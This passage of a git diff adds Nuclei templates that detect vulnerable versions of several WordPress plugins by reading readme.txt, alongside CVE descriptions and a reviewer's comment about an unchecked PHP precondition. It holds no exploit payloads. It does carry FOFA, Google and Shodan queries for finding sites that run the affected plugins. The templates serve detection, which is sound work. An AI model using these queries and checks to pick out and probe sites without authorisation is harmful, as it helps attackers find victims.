+ The Stackable – Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to CSS Injection in all versions up to, and including, 3.13.6. This makes it possible for unauthenticated attackers to embed untrusted style information into comments resulting in a possibility of data exfiltration such as admin nonces with limited impact. These nonces could be used to perform CSRF attacks within a limited time window. The presence of other plugins may make additional nonces available, which may pose a risk in plugins that don't perform capability checks to protect AJAX actions or other actions reachable by lower-privileged users.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-8760
+ metadata:
+ fofa-query: "wp-content/plugins/stackable-ultimate-gutenberg-blocks/"
+ google-query: inurl:"/wp-content/plugins/stackable-ultimate-gutenberg-blocks/"
+ shodan-query: 'vuln:CVE-2024-8760'
+ tags: cve,wordpress,wp-plugin,stackable-ultimate-gutenberg-blocks,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/stackable-ultimate-gutenberg-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "stackable-ultimate-gutenberg-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.13.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8902.yaml b/poc/cve/CVE-2024-8902.yaml
new file mode 100644
index 0000000000..f0a8f82297
--- /dev/null
+++ b/poc/cve/CVE-2024-8902.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8902
+
+info:
+ name: >
+ Elementor Addon Elements <= 1.13.8 - Authenticated (Contributor+) Sensitive Information Exposure via table_saved_sections
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.8 via the render_column function in modules/data-table/widgets/data-table.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7317ecf5-d43d-4080-ad2a-7644764dd41e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-8902
+ metadata:
+ fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-8902'
+ tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "addon-elements-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8915.yaml b/poc/cve/CVE-2024-8915.yaml
new file mode 100644
index 0000000000..5a8576c819
--- /dev/null
+++ b/poc/cve/CVE-2024-8915.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8915
+
+info:
+ name: >
+ Category Icon <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Category Icon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8915
+ metadata:
+ fofa-query: "wp-content/plugins/category-icon/"
+ google-query: inurl:"/wp-content/plugins/category-icon/"
+ shodan-query: 'vuln:CVE-2024-8915'
+ tags: cve,wordpress,wp-plugin,category-icon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/category-icon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "category-icon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9047.yaml b/poc/cve/CVE-2024-9047.yaml
new file mode 100644
index 0000000000..297e8b8f39
--- /dev/null
+++ b/poc/cve/CVE-2024-9047.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9047
+
+info:
+ name: >
+ WordPress File Upload <= 4.24.11 - Unauthenticated Path Traversal to Arbitrary File Read and Deletion in wfu_file_downloader.php
+ author: topscoder
+ severity: critical
+ description: >
+ The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-9047
+ metadata:
+ fofa-query: "wp-content/plugins/wp-file-upload/"
+ google-query: inurl:"/wp-content/plugins/wp-file-upload/"
+ shodan-query: 'vuln:CVE-2024-9047'
+ tags: cve,wordpress,wp-plugin,wp-file-upload,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-file-upload/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-file-upload"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.24.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9187.yaml b/poc/cve/CVE-2024-9187.yaml
new file mode 100644
index 0000000000..4dec4249b1
--- /dev/null
+++ b/poc/cve/CVE-2024-9187.yaml
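Review bot: The `description:` text states that exploitation requires PHP 7.4 or earlier, yet the matchers only compare the readme `Stable tag` against `<= 4.24.11`, so every host still shipping the old plugin is reported as `critical` whether or not its PHP runtime meets that precondition. readme.txt gives the template no reliable way to learn the PHP version, so rather than bolting on a fragile response-header check I would record the limitation where triage will see it, e.g. adding to the description `Version check only; the PHP <= 7.4 prerequisite is not verified by this template.` so that a critical hit is understood to need a second confirmation step.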
@@ -0,0 +1,59 @@
+id: CVE-2024-9187
+
+info:
+ name: >
+ Read more By Adam <= 1.1.8 - Missing Authorization to Authenticated (Subscriber+) Read More Button Deletion
+ author: topscoder
+ severity: low
+ description: >
+ The Read more By Adam plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteRm() function in all versions up to, and including, 1.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete read more buttons.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9187
+ metadata:
+ fofa-query: "wp-content/plugins/read-more/"
+ google-query: inurl:"/wp-content/plugins/read-more/"
+ shodan-query: 'vuln:CVE-2024-9187'
+ tags: cve,wordpress,wp-plugin,read-more,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/read-more/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "read-more"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9592.yaml b/poc/cve/CVE-2024-9592.yaml
new file mode 100644
index 0000000000..3e025e59b3
--- /dev/null
+++ b/poc/cve/CVE-2024-9592.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9592
+
+info:
+ name: >
+ Easy PayPal Gift Certificate <= 1.2.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via wpppgc_plugin_options
+ author: topscoder
+ severity: medium
+ description: >
+ The Easy PayPal Gift Certificate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the 'wpppgc_plugin_options' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9592
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-gift-certificate/"
+ google-query: inurl:"/wp-content/plugins/paypal-gift-certificate/"
+ shodan-query: 'vuln:CVE-2024-9592'
+ tags: cve,wordpress,wp-plugin,paypal-gift-certificate,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-gift-certificate/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-gift-certificate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9595.yaml b/poc/cve/CVE-2024-9595.yaml
new file mode 100644
index 0000000000..18fe14bc4f
--- /dev/null
+++ b/poc/cve/CVE-2024-9595.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9595
+
+info:
+ name: >
+ TablePress <= 2.4.2 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the table cell content in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9595
+ metadata:
+ fofa-query: "wp-content/plugins/tablepress/"
+ google-query: inurl:"/wp-content/plugins/tablepress/"
+ shodan-query: 'vuln:CVE-2024-9595'
+ tags: cve,wordpress,wp-plugin,tablepress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tablepress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9656.yaml b/poc/cve/CVE-2024-9656.yaml
new file mode 100644
index 0000000000..eb04457153
--- /dev/null
+++ b/poc/cve/CVE-2024-9656.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9656
+
+info:
+ name: >
+ Mynx Page Builder <= 0.27.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Mynx Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a25208-81fe-4337-a344-1c129bd80862?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9656
+ metadata:
+ fofa-query: "wp-content/plugins/mynx-page-builder/"
+ google-query: inurl:"/wp-content/plugins/mynx-page-builder/"
+ shodan-query: 'vuln:CVE-2024-9656'
+ tags: cve,wordpress,wp-plugin,mynx-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mynx-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mynx-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.27.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9670.yaml b/poc/cve/CVE-2024-9670.yaml
new file mode 100644
index 0000000000..20ecdfa0cf
--- /dev/null
+++ b/poc/cve/CVE-2024-9670.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9670
+
+info:
+ name: >
+ 2D Tag Cloud <= 6.0.2 - Reflected Cross-Site Scripting via add_query_arg Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The 2D Tag Cloud plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 6.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9670
+ metadata:
+ fofa-query: "wp-content/plugins/2d-tag-cloud-widget-by-sujin/"
+ google-query: inurl:"/wp-content/plugins/2d-tag-cloud-widget-by-sujin/"
+ shodan-query: 'vuln:CVE-2024-9670'
+ tags: cve,wordpress,wp-plugin,2d-tag-cloud-widget-by-sujin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/2d-tag-cloud-widget-by-sujin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "2d-tag-cloud-widget-by-sujin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9696.yaml b/poc/cve/CVE-2024-9696.yaml
new file mode 100644
index 0000000000..44be74f3f0
--- /dev/null
+++ b/poc/cve/CVE-2024-9696.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9696
+
+info:
+ name: >
+ Rescue Shortcodes <= 2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rescue_tab' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9517db1f-1704-4f25-9b02-795da3c4c067?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9696
+ metadata:
+ fofa-query: "wp-content/plugins/rescue-shortcodes/"
+ google-query: inurl:"/wp-content/plugins/rescue-shortcodes/"
+ shodan-query: 'vuln:CVE-2024-9696'
+ tags: cve,wordpress,wp-plugin,rescue-shortcodes,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rescue-shortcodes/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rescue-shortcodes"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9704.yaml b/poc/cve/CVE-2024-9704.yaml
new file mode 100644
index 0000000000..04083f502c
--- /dev/null
+++ b/poc/cve/CVE-2024-9704.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9704
+
+info:
+ name: >
+ Social Sharing (by Danny) <= 1.3.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Social Sharing (by Danny) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dvk_social_sharing' shortcode in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9704
+ metadata:
+ fofa-query: "wp-content/plugins/dvk-social-sharing/"
+ google-query: inurl:"/wp-content/plugins/dvk-social-sharing/"
+ shodan-query: 'vuln:CVE-2024-9704'
+ tags: cve,wordpress,wp-plugin,dvk-social-sharing,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dvk-social-sharing/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dvk-social-sharing"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9756.yaml b/poc/cve/CVE-2024-9756.yaml
new file mode 100644
index 0000000000..1a704b1c66
--- /dev/null
+++ b/poc/cve/CVE-2024-9756.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9756
+
+info:
+ name: >
+ Order Attachments for WooCommerce 2.0 - 2.4.1 - Missing Authorization to Authenticated (Subscriber+) Limited Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Order Attachments for WooCommerce plugin for WordPress is vulnerable to unauthorized limited arbitrary file uploads due to a missing capability check on the wcoa_add_attachment AJAX action in versions 2.0 to 2.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload limited file types.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfc8957-78b8-4c55-ba95-52d95b086341?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9756
+ metadata:
+ fofa-query: "wp-content/plugins/order-attachments-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/order-attachments-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-9756'
+ tags: cve,wordpress,wp-plugin,order-attachments-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/order-attachments-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "order-attachments-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '>= 2.0', '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9776.yaml b/poc/cve/CVE-2024-9776.yaml
new file mode 100644
index 0000000000..6865c41934
--- /dev/null
+++ b/poc/cve/CVE-2024-9776.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9776
+
+info:
+ name: >
+ ImagePress - Image Gallery <= 1.2.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings
+ author: topscoder
+ severity: low
+ description: >
+ The ImagePress – Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/655c08e6-4ef2-438e-b381-1bc3748c3771?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-9776
+ metadata:
+ fofa-query: "wp-content/plugins/image-gallery/"
+ google-query: inurl:"/wp-content/plugins/image-gallery/"
+ shodan-query: 'vuln:CVE-2024-9776'
+ tags: cve,wordpress,wp-plugin,image-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "image-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9778.yaml b/poc/cve/CVE-2024-9778.yaml
new file mode 100644
index 0000000000..0ef4a189af
--- /dev/null
+++ b/poc/cve/CVE-2024-9778.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9778
+
+info:
+ name: >
+ ImagePress – Image Gallery <= 1.2.2 - Cross-Site Request Forgery to Plugin Settings Update
+ author: topscoder
+ severity: medium
+ description: >
+ The ImagePress – Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. This makes it possible for unauthenticated attackers to update plugin settings, including redirection URLs, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/200b3446-6107-434b-b46d-2078461f3f94?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9778
+ metadata:
+ fofa-query: "wp-content/plugins/image-gallery/"
+ google-query: inurl:"/wp-content/plugins/image-gallery/"
+ shodan-query: 'vuln:CVE-2024-9778'
+ tags: cve,wordpress,wp-plugin,image-gallery,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "image-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9821.yaml b/poc/cve/CVE-2024-9821.yaml
new file mode 100644
index 0000000000..ff9282d9e1
--- /dev/null
+++ b/poc/cve/CVE-2024-9821.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9821
+
+info:
+ name: >
+ Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass
+ author: topscoder
+ severity: low
+ description: >
+ The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a662c904-ba2e-494c-a603-b22eeeddf43d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-9821
+ metadata:
+ fofa-query: "wp-content/plugins/bot-for-telegram-on-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/bot-for-telegram-on-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-9821'
